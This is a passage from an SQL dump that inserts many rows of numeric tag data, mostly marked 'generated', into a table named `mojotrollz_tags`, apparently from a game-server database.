`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2103, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2104, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2104, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2105, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2105, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2106, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2106, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2107, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2108, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2108, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2110, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2111, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2112, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2115, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2116, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2117, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2118, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2119, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2120, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2121, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2122, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2126, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2127, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2128, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2128, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2129, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2129, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2130, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2130, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2131, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2131, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2132, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2132, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2134, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2134, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2135, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2135, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2136, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2137, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2140, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2142, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2150, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2151, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2152, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2153, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2155, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2156, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2162, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2163, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2164, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2165, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2166, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2166, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2167, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2168, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2168, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2169, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2170, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2171, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2172, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2172, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2173, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2174, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2175, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2175, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2176, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2177, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2178, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2179, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2180, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2181, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2181, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2183, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2184, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2186, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2186, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2187, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2191, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2192, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2192, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2198, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2201, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2203, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2203, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2204, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2205, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2206, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2206, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2207, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2207, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2208, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2208, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2209, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2209, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2210, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2210, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2211, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2211, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2212, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2214, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2214, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2215, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2215, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2216, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2224, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2225, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2225, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2225, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2226, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2226, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2227, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2227, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2227, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2227, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2227, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2228, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2229, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2230, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2230, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2231, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2232, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2233, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2233, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2235, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2235, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2237, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2238, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2239, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2239, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2240, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2241, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2242, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2242, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2243, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2243, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2244, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2245, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2246, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2247, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2248, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2249, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2250, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2251, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` 